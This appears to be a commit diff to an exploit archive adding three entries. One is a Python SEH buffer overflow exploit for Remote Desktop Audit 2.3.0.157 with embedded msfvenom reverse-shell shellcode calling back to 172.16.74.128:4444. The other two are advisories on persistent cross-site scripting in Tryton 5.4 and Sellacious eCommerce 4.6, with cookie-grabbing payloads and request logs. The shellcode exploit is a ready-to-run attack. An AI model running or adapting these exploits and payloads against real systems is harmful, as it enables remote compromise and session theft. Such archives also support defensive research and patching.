DB: 2020-05-14
4 changes to exploits/shellcodes Remote Desktop Audit 2.3.0.157 - Buffer Overflow (SEH) Tryton 5.4 - Persistent Cross-Site Scripting Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting
This commit is contained in:
parent
f564ddfd17
commit
fe5d64b70c
5 changed files with 385 additions and 7 deletions
|
@ -37,10 +37,4 @@ Parameter: id (GET)
|
|||
[08:55:01] [INFO] the back-end DBMS is MySQL
|
||||
web server operating system: Linux Ubuntu
|
||||
web application technology: Apache 2.4.29
|
||||
back-end DBMS: MySQL >= 5.0.12
|
||||
|
||||
I am looking forward to you accepting and approving my PoC.
|
||||
|
||||
Thankyou!
|
||||
|
||||
Vu Tien Hoa
|
||||
back-end DBMS: MySQL >= 5.0.12
|
171
exploits/php/webapps/48466.txt
Normal file
171
exploits/php/webapps/48466.txt
Normal file
|
@ -0,0 +1,171 @@
|
|||
# Exploit Title: Tryton 5.4 - Persistent Cross-Site Scripting
|
||||
# Exploit Author: Vulnerability-Lab
|
||||
# Date: 2020-05-13
|
||||
# Vendor Homepage: https://www.tryton.org/
|
||||
# Version: 5.4
|
||||
# Software Link: https://www.tryton.org/download
|
||||
|
||||
|
||||
Document Title:
|
||||
===============
|
||||
Tryton v5.4 - (Name) Persistent Cross Site Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
https://www.vulnerability-lab.com/get_content.php?id=2233
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
4.4
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
https://www.tryton.org/ & https://www.tryton.org/download
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
Tryton Foundation
|
||||
Product: Tryton v5.4 - CMS (Web-Application)
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2020-05-12: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A persistent input validation web vulnerability has been discovered in
|
||||
the official Tryton v5.4 web-application series.
|
||||
The vulnerability allows remote attackers to inject own malicious script
|
||||
codes with persistent attack vector to compromise
|
||||
browser to web-application requests from the application-side.
|
||||
|
||||
The persistent vulnerability is located in the `name` parameter of the
|
||||
`User Profile` module. Remote attackers with low
|
||||
privileges are able to inject own malicious persistent script code as
|
||||
name for user accounts. The injected code can be
|
||||
used to attack the frontend or backend of the web-application. The
|
||||
request method to inject is POST and the attack vector
|
||||
is located on the application-side. Injection point is the profile input
|
||||
field with the name value and the execute occurs
|
||||
in the front ui on top right were the avatar is listed or in the admin
|
||||
backend on the res.user;name="Users"&views.
|
||||
|
||||
Successful exploitation of the vulnerabilities results in session
|
||||
hijacking, persistent phishing attacks, persistent
|
||||
external redirects to malicious source and persistent manipulation of
|
||||
affected application modules.
|
||||
|
||||
Request Method(s):
|
||||
[+] POST
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] User Profile
|
||||
|
||||
Vulnerable Input(s):
|
||||
[+] Name
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] name
|
||||
|
||||
Affected Module(s):
|
||||
[+] /index
|
||||
[+] /model/res.user;name="Users"&views (backend)
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The persistent web vulnerability can be exploited by low privileged web
|
||||
application user account with low user interaction.
|
||||
For security demonstration or to reproduce the vulnerability follow the
|
||||
provided information and steps below to continue.
|
||||
|
||||
|
||||
Manual steps to reproduce the vulnerability ...
|
||||
1. Open the application and login to your low privileged user account
|
||||
2. Move to the profile on top right side (click)
|
||||
3. Inject test payload to the "Name" input field and save the entry
|
||||
4. Execution occurs after save on top right and
|
||||
/model/res.user;name="Users"&views of the admin backend
|
||||
5. Successful reproduce of the persistent cross site vulnerability!
|
||||
|
||||
|
||||
PoC: Payload
|
||||
%20>"><img%20src="evil.source%20onload=alert(document.cookie)>
|
||||
|
||||
|
||||
PoC: Vulnerable Source (Execution Point)
|
||||
<div class="input-group input-group-sm"><span
|
||||
class="input-group-btn"><button type="button" class="btn
|
||||
btn-default">Filters</button></span>
|
||||
<input class="form-control mousetrap" placeholder="Search"
|
||||
autocomplete="off" list="ui-id-3"><datalist id="ui-id-3"></datalist>
|
||||
<span class="input-group-btn"><button type="button" class="btn
|
||||
btn-default hidden-md hidden-lg" aria-label="Clear Search"
|
||||
title="Clear Search" style="display: none;"><img class="icon"
|
||||
src="blob:https://tryton.localhost:8080/4672612e-3ec6-4bd1-aa4d-bd379bd89c04"></button>
|
||||
<button type="submit" class="btn btn-default" aria-label="Search"
|
||||
title="Search"><img class="icon"
|
||||
src="blob:https://demo5.4.tryton.org/ab0d098c-1302-4ffa-8f27-3204fb244082"></button><button
|
||||
class="btn btn-default hidden-xs"
|
||||
type="button" title="Bookmark this filter" aria-label="Bookmark this
|
||||
filter"><img class="icon" aria-hidden="true"
|
||||
src="blob:https://demo5.4.tryton.org/d97b8af2-ca4b-48e2-a40e-a772955d7ea8"></button><button
|
||||
type="button" class="btn btn-default
|
||||
dropdown-toggle" data-toggle="dropdown" aria-expanded="false"
|
||||
aria-label="Bookmarks" title="Bookmarks" id="bookmarks" disabled="">
|
||||
<img aria-hidden="true" class="icon"
|
||||
src="blob:https://demo5.4.tryton.org/c9b2efdd-1ec8-4785-b7a0-d3b8dcb6d7e9"></button>
|
||||
<ul class="dropdown-menu dropdown-menu-right" role="menu"
|
||||
aria-labelledby="bookmarks"></ul><button type="button"
|
||||
class="btn btn-default hidden-xs" aria-expanded="false" aria-label="Show
|
||||
inactive records" title="Show inactive records">
|
||||
<img aria-hidden="true" class="icon"
|
||||
src="blob:https://demo5.4.tryton.org/6ad6ad9c-4d17-4592-9e3c-6f698b6f9a27"></button></span></div>
|
||||
|
||||
|
||||
--- PoC Session Logs [POST] ---
|
||||
https://tryton.localhost:8080/tryton/
|
||||
Host: tryton.localhost:8080
|
||||
Accept: application/json, text/javascript, */*; q=0.01
|
||||
Content-Type: application/json
|
||||
Authorization: Session
|
||||
ZGVtbzoyOjMyYmIyOWE3ODYxMzA3NGVkZThlMDBhNmEyMWVkNzFhZTAxOGQwMzA1YTJhMGU1NTNjOWU2YTNhZWM5MzA1MzM=
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Length: 527
|
||||
Origin: https://tryton.localhost:8080
|
||||
Connection: keep-alive
|
||||
Referer: https://tryton.localhost:8080/
|
||||
{"id":195,"method":"model.res.user.set_preferences","params":[{"name":"%20>"><img%20src="evil.source%20onload=alert(document.cookie)>">",
|
||||
"signature":"test
|
||||
signature"},{"client":"1aab6de2-1f59-43de-b0d0-a8319558e4e8","warehouse":null,"employee":null,"company":1,
|
||||
"company.rec_name":"Michael Scott Paper
|
||||
Company","language":"en","language_direction":"ltr","groups":[5,15,16,13,19,20,17,9,10],
|
||||
"locale":{"date":"%m/%d/%Y","grouping":[3,3,0],"decimal_point":".","thousands_sep":","},"company_work_time":
|
||||
{"h":3600,"m":60,"s":1,"Y":6912000,"M":576000,"w":144000,"d":28800}}]}
|
||||
-
|
||||
POST: HTTP/2.0 200 OK
|
||||
server: nginx/1.16.1
|
||||
content-type: application/json
|
||||
access-control-allow-origin: https://tryton.localhost:8080
|
||||
vary: Origin
|
||||
content-encoding: gzip
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability-Lab -
|
||||
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
|
||||
Benjamin Kunz Mejri -
|
||||
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
|
||||
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
138
exploits/php/webapps/48467.txt
Normal file
138
exploits/php/webapps/48467.txt
Normal file
|
@ -0,0 +1,138 @@
|
|||
# Exploit Title: Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting
|
||||
# Exploit Author: gurbanli
|
||||
# Date: 2020-05-13
|
||||
# Vendor Homepage: https://www.sellacious.com
|
||||
# Version: 4.6
|
||||
# Software Link: https://www.sellacious.com/free-open-source-ecommerce-software
|
||||
|
||||
Document Title:
|
||||
===============
|
||||
Sellacious eCommerce - Multiple Persistent Vulnerabilities
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
https://www.vulnerability-lab.com/get_content.php?id=2226
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
4.6
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
https://www.sellacious.com/free-open-source-ecommerce-software
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2020-05-08: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A persistent input validation web vulnerability has been discovered in
|
||||
the official Sellacious eCommerce Shop CMS (2020 Q1).
|
||||
The vulnerability allows remote attackers to inject own malicious script
|
||||
codes with persistent attack vector to compromise
|
||||
browser to web-application requests from the application-side.
|
||||
|
||||
The cross site web vulnerabilities are located in the all the adress
|
||||
input fields of the `Manage Your Addresses` module.
|
||||
Remote attackers are able to register a low privilege user account to
|
||||
inject own malicious script code to the adress
|
||||
information page. The execution of the script code occurs each time the
|
||||
adress information is used in the web ui of
|
||||
the ecommerce application. The request method to inject is POST and the
|
||||
attack vector is persistent on the application-side.
|
||||
|
||||
Successful exploitation of the vulnerabilities results in session
|
||||
hijacking, persistent phishing attacks, persistent
|
||||
external redirects to malicious source and persistent manipulation of
|
||||
affected application modules.
|
||||
|
||||
Request Method(s):
|
||||
[+] POST
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] Manage Your Addresses
|
||||
|
||||
Vulnerable Input(s):
|
||||
[+] Full name
|
||||
[+] First name
|
||||
[+] Middle name
|
||||
[+] Last name
|
||||
[+] Company
|
||||
[+] PO Box
|
||||
[+] Address
|
||||
[+] Landmark
|
||||
|
||||
Affected(s):
|
||||
[+] index.php/manage-your-addresses
|
||||
[+] Backend user adress information listing
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The persistent input validation web vulnerabilities can be exploited by
|
||||
remote attackers with user account and low user interaction.
|
||||
For security demonstration or to reproduce the web vulnerability follow
|
||||
the provided information and steps below to continue.
|
||||
|
||||
|
||||
PoC: Exploitation
|
||||
<iframe src="evil.source" onload=alert(document.cookie)>
|
||||
<iframe src="evil.source" onload=alert(document.domain)>
|
||||
|
||||
|
||||
PoC: Vulnerable Source
|
||||
<div class="addresses-container">
|
||||
<div class="address-heading">
|
||||
<h2>Your addresses
|
||||
<a href="#address-form-0" role="button" data-toggle="ctech-modal"
|
||||
class="ctech-mb-3 btn-add-address ctech-float-right ctech-text-primary">
|
||||
<i class="fa fa-plus"></i> <span class="add-address-text">Add New
|
||||
Address</span></a></h2></div>
|
||||
<div id="addresses" class="cart-aio ctech-text-center">
|
||||
<div id="address-editor">
|
||||
<ul id="address-items" data-original-title="" title=""> <li
|
||||
class="address-item" id="address-item-9"> <div class="ctech-float-right
|
||||
address-action">
|
||||
<button type="button" class="ctech-btn ctech-btn-small ctech-btn-default
|
||||
hasTooltip remove-address" data-placement="bottom" data-id="9" title=""
|
||||
data-original-title="Delete"><i class="fa fa-trash-alt"></i></button> <a
|
||||
href="#address-form-9" role="button" data-toggle="ctech-modal"
|
||||
data-placement="bottom"
|
||||
class="ctech-btn ctech-btn-small ctech-btn-default hasTooltip" title=""
|
||||
data-original-title="Edit"><i class="fa fa-edit"></i></a> </div>
|
||||
<div class="address-content"> <span class="address_name">>"<iframe
|
||||
src="evil.source"></span> <span class="address_company">>"<iframe
|
||||
src="evil.source"></span>
|
||||
<span class="address_po_box">PO #: >"<iframe src="evil.source"></span>
|
||||
<span class="address_address has-comma">>"<iframe src="evil.source"></span>
|
||||
<span class="address_landmark has-comma">>"<iframe
|
||||
src="evil.source"></span> <span class="address_country">United
|
||||
States</span>
|
||||
<div class="cart_address_box w100p"> <div class="cart_address_buttons">
|
||||
</div> </div> </div> </li> <li class="address-item odd-address-item">
|
||||
<a href="#address-form-0" role="button" data-toggle="ctech-modal"
|
||||
class="btn-new-address"><i class="fa fa-plus"></i></a> </li>
|
||||
</iframe></span></div></li></ul>
|
||||
<div class="ctech-wrapper">
|
||||
</div><div class="ctech-clearfix"></div>
|
||||
</div><div class="ctech-clearfix"></div>
|
||||
</div></div>
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability-Lab -
|
||||
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
|
||||
Benjamin Kunz Mejri -
|
||||
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
72
exploits/windows/local/48465.py
Executable file
72
exploits/windows/local/48465.py
Executable file
|
@ -0,0 +1,72 @@
|
|||
# Exploit Title: Remote Desktop Audit 2.3.0.157 - Buffer Overflow (SEH)
|
||||
# Exploit Author: gurbanli
|
||||
# Date: 2020-05-12
|
||||
# Vulnerable Software: Remote Desktop Audit 2.3.0.157
|
||||
# Vendor Homepage: https://lizardsystems.com
|
||||
# Version: 2.3.0.157
|
||||
# Software Link: https://lizardsystems.com/download/rdaudit_setup.exe
|
||||
# Tested on: Windows 7 x86
|
||||
f = file('payload.txt','w')
|
||||
|
||||
"""
|
||||
Same with LanSend 3.2, but with different ppr address.
|
||||
PoC
|
||||
1. Run exploit
|
||||
2. Run Remote Desktop Audit and Click Add Computers Wizard
|
||||
3. Choose import computers from file
|
||||
4. Copy/paste payload.txt content into filename section
|
||||
5. shellcode will be executed
|
||||
|
||||
"""
|
||||
|
||||
"""
|
||||
msfvenom -p windows/shell_reverse_tcp lhost=172.16.74.128 lport=4444 EXITFUNC=thread -f py -v shellcode -e x86/shikata_ga_nai -b '\x00\x0a\x0d'
|
||||
"""
|
||||
|
||||
shellcode = b""
|
||||
shellcode += b"\xda\xd0\xd9\x74\x24\xf4\x58\xbe\xa4\x95\xaf"
|
||||
shellcode += b"\xc4\x2b\xc9\xb1\x52\x31\x70\x17\x03\x70\x17"
|
||||
shellcode += b"\x83\x4c\x69\x4d\x31\x70\x7a\x10\xba\x88\x7b"
|
||||
shellcode += b"\x75\x32\x6d\x4a\xb5\x20\xe6\xfd\x05\x22\xaa"
|
||||
shellcode += b"\xf1\xee\x66\x5e\x81\x83\xae\x51\x22\x29\x89"
|
||||
shellcode += b"\x5c\xb3\x02\xe9\xff\x37\x59\x3e\xdf\x06\x92"
|
||||
shellcode += b"\x33\x1e\x4e\xcf\xbe\x72\x07\x9b\x6d\x62\x2c"
|
||||
shellcode += b"\xd1\xad\x09\x7e\xf7\xb5\xee\x37\xf6\x94\xa1"
|
||||
shellcode += b"\x4c\xa1\x36\x40\x80\xd9\x7e\x5a\xc5\xe4\xc9"
|
||||
shellcode += b"\xd1\x3d\x92\xcb\x33\x0c\x5b\x67\x7a\xa0\xae"
|
||||
shellcode += b"\x79\xbb\x07\x51\x0c\xb5\x7b\xec\x17\x02\x01"
|
||||
shellcode += b"\x2a\x9d\x90\xa1\xb9\x05\x7c\x53\x6d\xd3\xf7"
|
||||
shellcode += b"\x5f\xda\x97\x5f\x7c\xdd\x74\xd4\x78\x56\x7b"
|
||||
shellcode += b"\x3a\x09\x2c\x58\x9e\x51\xf6\xc1\x87\x3f\x59"
|
||||
shellcode += b"\xfd\xd7\x9f\x06\x5b\x9c\x32\x52\xd6\xff\x5a"
|
||||
shellcode += b"\x97\xdb\xff\x9a\xbf\x6c\x8c\xa8\x60\xc7\x1a"
|
||||
shellcode += b"\x81\xe9\xc1\xdd\xe6\xc3\xb6\x71\x19\xec\xc6"
|
||||
shellcode += b"\x58\xde\xb8\x96\xf2\xf7\xc0\x7c\x02\xf7\x14"
|
||||
shellcode += b"\xd2\x52\x57\xc7\x93\x02\x17\xb7\x7b\x48\x98"
|
||||
shellcode += b"\xe8\x9c\x73\x72\x81\x37\x8e\x15\x02\xd7\xda"
|
||||
shellcode += b"\x65\x32\xda\xda\x74\x9f\x53\x3c\x1c\x0f\x32"
|
||||
shellcode += b"\x97\x89\xb6\x1f\x63\x2b\x36\x8a\x0e\x6b\xbc"
|
||||
shellcode += b"\x39\xef\x22\x35\x37\xe3\xd3\xb5\x02\x59\x75"
|
||||
shellcode += b"\xc9\xb8\xf5\x19\x58\x27\x05\x57\x41\xf0\x52"
|
||||
shellcode += b"\x30\xb7\x09\x36\xac\xee\xa3\x24\x2d\x76\x8b"
|
||||
shellcode += b"\xec\xea\x4b\x12\xed\x7f\xf7\x30\xfd\xb9\xf8"
|
||||
shellcode += b"\x7c\xa9\x15\xaf\x2a\x07\xd0\x19\x9d\xf1\x8a"
|
||||
shellcode += b"\xf6\x77\x95\x4b\x35\x48\xe3\x53\x10\x3e\x0b"
|
||||
shellcode += b"\xe5\xcd\x07\x34\xca\x99\x8f\x4d\x36\x3a\x6f"
|
||||
shellcode += b"\x84\xf2\x5a\x92\x0c\x0f\xf3\x0b\xc5\xb2\x9e"
|
||||
shellcode += b"\xab\x30\xf0\xa6\x2f\xb0\x89\x5c\x2f\xb1\x8c"
|
||||
shellcode += b"\x19\xf7\x2a\xfd\x32\x92\x4c\x52\x32\xb7"
|
||||
|
||||
"""
|
||||
047FFF09 59 POP ECX
|
||||
047FFF0A 59 POP ECX
|
||||
047FFF0B 80C1 64 ADD CL,64
|
||||
047FFF0E ^FFE1 JMP ECX
|
||||
"""
|
||||
jmp_to_shellcode = '\x59\x59\x80\xc1\x64\xff\xe1'
|
||||
|
||||
"""ppr 00418230"""
|
||||
|
||||
payload = '\x90' * 30 + shellcode + jmp_to_shellcode + 'A' * 12 + '\xeb\xeb\x90\x90' + '\x30\x82\x41'
|
||||
f.write(payload)
|
||||
f.close()
|
|
@ -11070,6 +11070,7 @@ id,file,description,date,author,type,platform,port
|
|||
48415,exploits/windows/local/48415.py,"Frigate 3.36 - Buffer Overflow (SEH)",2020-05-04,"Xenofon Vassilakopoulos",local,windows,
|
||||
48418,exploits/windows/local/48418.txt,"Oracle Database 11g Release 2 - 'OracleDBConsoleorcl' Unquoted Service Path",2020-05-05,"Nguyen Khang",local,windows,
|
||||
48448,exploits/windows/local/48448.txt,"SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions",2020-05-11,"Jens Regel",local,windows,
|
||||
48465,exploits/windows/local/48465.py,"Remote Desktop Audit 2.3.0.157 - Buffer Overflow (SEH)",2020-05-13,gurbanli,local,windows,
|
||||
48461,exploits/windows/local/48461.py,"LanSend 3.2 - Buffer Overflow (SEH)",2020-05-12,gurbanli,local,windows,
|
||||
48464,exploits/macos/local/48464.py,"MacOS 320.whatis Script - Privilege Escalation",2020-05-12,"Csaba Fitzl",local,macos,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
|
@ -42694,3 +42695,5 @@ id,file,description,date,author,type,platform,port
|
|||
48459,exploits/java/webapps/48459.txt,"Cisco Digital Network Architecture Center 1.3.1.4 - Persistent Cross-Site Scripting",2020-05-12,"Dylan Garnaud",webapps,java,
|
||||
48460,exploits/php/webapps/48460.txt,"qdPM 9.1 - Arbitrary File Upload",2020-05-12,Besim,webapps,php,
|
||||
48462,exploits/java/webapps/48462.py,"TylerTech Eagle 2018.3.11 - Remote Code Execution",2020-05-12,"Anthony Cole",webapps,java,
|
||||
48466,exploits/php/webapps/48466.txt,"Tryton 5.4 - Persistent Cross-Site Scripting",2020-05-13,Vulnerability-Lab,webapps,php,
|
||||
48467,exploits/php/webapps/48467.txt,"Sellacious eCommerce 4.6 - Persistent Cross-Site Scripting",2020-05-13,Vulnerability-Lab,webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue